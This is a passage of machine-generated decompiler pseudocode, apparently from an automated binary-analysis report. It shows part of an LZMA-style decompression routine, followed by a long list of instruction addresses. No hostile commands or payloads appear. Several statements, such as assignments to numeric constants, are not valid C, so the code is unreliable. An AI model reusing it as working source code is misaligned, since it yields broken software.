                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L110:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t366 = __ebp - 0x70;
                                                											 *_t366 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t366;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L112;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											L132:
                                                											 *(_t612 - 0x54) = _t605;
                                                											goto L133;
                                                										case 0x12:
                                                											goto L0;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												goto L144;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											goto L130;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											L140:
                                                											 *(_t612 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L121;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											goto L145;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
                                                											goto L149;
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L120:
                                                												_t394 = __ebp - 0x2c;
                                                												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t394;
                                                												L121:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t401 = __ebp - 0x60;
                                                												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t401;
                                                												goto L124;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L103:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L109:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L113:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t392 = __ebp - 0x2c;
                                                														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t392;
                                                														goto L120;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L112:
                                                														_t369 = __ebp - 0x48;
                                                														 *_t369 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t369;
                                                														goto L113;
                                                													} else {
                                                														goto L110;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L102:
                                                													_t339 = __ebp - 0x48;
                                                													 *_t339 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t339;
                                                													goto L103;
                                                												} else {
                                                													goto L100;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L109;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L80;
                                                										case 0x1b:
                                                											L76:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t275 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t275;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t284 = __ebp - 0x64;
                                                											 *_t284 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t284;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L80:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L81;
                                                										case 0x1c:
                                                											while(1) {
                                                												L124:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t415 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t415;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t415;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L81:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											L170:
                                                											_push(0x22);
                                                											_pop(_t567);
                                                											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                											_t535 = 0;
                                                											L172:
                                                											return _t535;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                						__eax =  *(__ebp - 0x50);
                                                						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                						__eax =  *(__ebp - 0x58);
                                                						__esi = __edx + __eax;
                                                						 *(__ebp - 0x54) = __esi;
                                                						__ax =  *__esi;
                                                						__edi = __ax & 0x0000ffff;
                                                						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                						if( *(__ebp - 0xc) >= __ecx) {
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                							__cx = __ax;
                                                							__cx = __ax >> 5;
                                                							__eax = __eax - __ecx;
                                                							__edx = __edx + 1;
                                                							 *__esi = __ax;
                                                							 *(__ebp - 0x50) = __edx;
                                                						} else {
                                                							 *(__ebp - 0x10) = __ecx;
                                                							0x800 = 0x800 - __edi;
                                                							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                							 *__esi = __cx;
                                                						}
                                                						if( *(__ebp - 0x10) >= 0x1000000) {
                                                							goto L148;
                                                						} else {
                                                							goto L146;
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}








                                                0x00000000
                                                0x00406f10
                                                0x00406f10
                                                0x00406f14
                                                0x00406f39
                                                0x00406f43
                                                0x00000000
                                                0x00406f16
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f23
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00407004
                                                0x00407004
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00406fc2
                                                0x00406fc2
                                                0x00406fc2
                                                0x0040675e
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00000000
                                                0x0040714a
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00406fbc
                                                0x00406fbc
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00000000
                                                0x00406967
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00406943
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00000000
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00000000
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00000000
                                                0x00406cb2
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00000000
                                                0x00406ffd
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00000000
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
